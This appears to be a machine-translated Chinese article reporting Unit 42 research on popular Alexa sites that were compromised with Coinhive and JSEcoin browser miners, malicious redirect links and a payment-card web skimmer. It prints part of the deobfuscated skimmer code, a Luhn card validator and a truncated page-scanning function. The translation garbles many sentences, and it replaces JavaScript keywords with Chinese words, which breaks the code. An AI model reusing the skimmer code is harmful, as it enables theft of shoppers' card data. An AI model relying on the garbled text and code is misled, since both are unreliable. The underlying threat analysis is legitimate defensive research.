Alexa的热门网站感染了恶意挖币器和webskimmerUnit42最近在Alexa上发起了针对AlexaRank是全球排名前10,000的网站,它根据访问者的互动和访问来衡量网站的受欢迎程度。如表1所示,研究人员发现了四个受影响的网站。在随后的分析中,研究人员将更详细地描述这些恶意活动,包括劫持CPU资源来挖掘加密货币的CoinMiner挖矿病毒。早在2017年就发现了CoinMiner,它是一种无文件恶意软件,它使用WMI(WindowsManagementInstrumentation)在受感染的系统上运行命令,专家表示很难检测到并使用永恒的蓝色传播。除了CoinMiner挖矿病毒,还有恶意外部链接将用户引导至恶意网站;还有一种Webskimmer攻击,旨在从支付表单中窃取银行卡信息。Webskimmer,又称Magecart攻击,早在2018年就被评为最危险的安全威胁。这种攻击主要针对支付数据,因为WebSkimming可以向目标网站填充任意信息,所以攻击者可能无法目前仅限于银行信用卡数据,但将攻击范围扩大到网站登录信息等敏感数据信息上级。受网络安全影响的Alexa网站上的CoinMiner挖矿病毒coinhive,专门提供JS引擎进行挖矿。被攻击网站的网页中嵌入了一段JS代码。只要有人访问被攻击网站,挖矿程序就会出现在网民身上,占用大量系统资源,导致CPU使用率骤增,甚至100%!不仅被攻击的网站是受害者,普通网民也是受害者。Coinhive最初是一种浏览器挖掘服务,为Monero区块链提供JavaScript挖掘。该网站于2019年3月关闭,很大程度上是因为它被网络攻击者滥用。不过目前还有两个网站提供了Coinhive的挖矿程序脚本。一个是coinhive.min.js,另一个是JSEcoin。下面的图1显示了在受感染的网站zoombangla[.]com上启动coinminer所发出的命令。使用定义的参数启动Coinhive挖矿的命令挖矿程序可以控制它如何利用用户的CPU以及用于挖矿的线程数。CoinMiner还可以控制目标使用的CPU数量。表2列出了可用的参数选项。奇怪的是,上述代码将矿工配置为快速耗尽受感染设备的电池,这可能是因为攻击者觉得有必要充分利用任何成功入侵的受害者。大多数攻击者确保受感染设备的用电量保持在较低水平,以避免被发现并继续非法赚钱。然而,在此处提供的示例中,攻击者似乎急于挖矿,并且没有正确配置以逃避检测。参数限制和CPU使用率映射下面显示的是从另一个发现的网站pojoksatu[.]id启动Coinhive挖矿脚本的命令的另一个示例。使用默认参数启动Coinhive挖矿脚本的命令一旦用户访问上述两个网站中的任何一个,Coinhive挖矿脚本就会自动运行并为攻击者开始挖矿。此时,用户的CPU负载会增加,如图3所示。CPU负载活动研究人员在pojoksatu[.]id和zoombangla[.]com中总共发现了60多个注入了Coinhive挖矿脚本的URL页面。详情见下面的附录。恶意外部链接外部链接安全变得越来越重要。随着电子邮件服务在发现垃圾邮件和其他类型的恶意邮件方面的改进,攻击者正在使用带有外部链接的开放重定向发起更多攻击。如果攻击者在合法网站的帖子中发布恶意URL,很少有访问者会觉得可疑。如果用户点击链接甚至将鼠标悬停在链接上进行检查,他们会在链接中看到一个有效的网站,认为这是错误的,用户最终会进入攻击者想要将他们重定向到恶意网站的位置。然后用户感染某种恶意软件,例如CoinMiner挖矿病毒,或者他们的个人信息被盗。图4是libero[.],一个合法的二手车网站,用户可以在这里搜索和比较自己喜欢的车辆。这时,攻击者可能会在汽车广告中插入恶意链接。这些链接会将对汽车感兴趣的访问者重定向到恶意网站。此时网站会向他们注入JSEcoinCoinMiner脚本,如下图所示。请注意,JSEcoin平台已于2020年4月4日关闭。虽然脚本仍在运行,但攻击者无法再从中执行CoinMiner攻击。libero[.]it,它将访问者重定向到受感染的网站。源码页面如下图:包含恶意链接的页面源代码如上图所示,所有高亮显示的外部链接均指向libero[.]它。如果用户想了解更多关于汽车的信息,他们需要点击这个链接,然后他们就会被重定向到一个恶意网站。Redirectchain这个网站是注入CoinMiner挖矿病毒的地方。启动JSEcoin挖矿程序Webskimmer的命令今年5月,美国联邦调查局发现黑客利用Magento插件中存在三年的漏洞接管在线商店,并植入恶意脚本到记录并窃取买家的付款。卡数据。这种类型的攻击被称为网页浏览、电子浏览或Magecart,FBI去年10月警告说此类攻击会增加。在5月初发送给美国私营部门的快速安全警报中,FBI表示,在最近的一次攻击中,攻击者利用了MAGMI(MagentoMassImport)插件中的CVE-2017-7391漏洞。该缺陷是一个跨站点脚本(XSS)缺陷,允许攻击者将恶意代码注入在线商店的HTML代码中。研究人员在Alexa排名靠前的网站中发现的样本源于另一个外部链接安全漏洞。heureka[.]cz本身就是一个在线购物网站。如果用户在网站上搜索Anti-COVID产品(网站上的热门搜索关键字),则会显示相关产品列表。产品样本产品后面是列出的商店,用户可以选择从中购买。heureka[.]cz中被攻陷网站的链接源页面如下所示:包含恶意链接的页面源代码,突出显示点击访问该店铺后,用户将被重定向至恶意网站。重定向链,不幸的是,整个站点都散布着混淆的恶意浏览器脚本,如下图所示。混淆的skimmer代码上面的代码是混淆的,因此很难预测它们导致的行为。研究人员必须首先混淆代码。研究人员随后发现了以下功能,可以偷偷监控用户输入的支付卡信息,并将其发送到远程攻击服务器。functionG1ED7H(XYRUDR){varZU554M=0;XYRUDR=XYRUDR["split"]("");if(XYRUDR["length"]<13||XYRUDR["length"]>19)returnfalse;for(varE9VLQF=XYRUDR[“长度”]-1;E9VLQF>=0;E9VLQF--){if(!XYRUDR[E9VLQF][“匹配”](/[0-9]/))返回假;if(!(E9VLQF%2)){ZU554M+=(XYRUDR[E9VLQF]*2>9)?XYRUDR[E9VLQF]*2-9:XYRUDR[E9VLQF]*2}else{ZU554M+=XYRUDR[E9VLQF]*1}}返回!(ZU554M%10)}该函数用于通过Luhn算法验证信用卡号,Luhn算法被广泛用于验证各种身份识别号,例如信用卡号。卢恩算法(Luhnalgorithm),也称为“模块10”(Mod10)算法,是一种简单的校验和算法,一般用于验证身份码,如发卡机构识别码、国际移动设备识别码(IMEI)、美国国家提供者识别号码,或加拿大社会保险号码。functionXYRUDR(){varP23WTA=document['all']||document['getElementsByTagName'](*);for(E9VLQF=0;E9VLQF
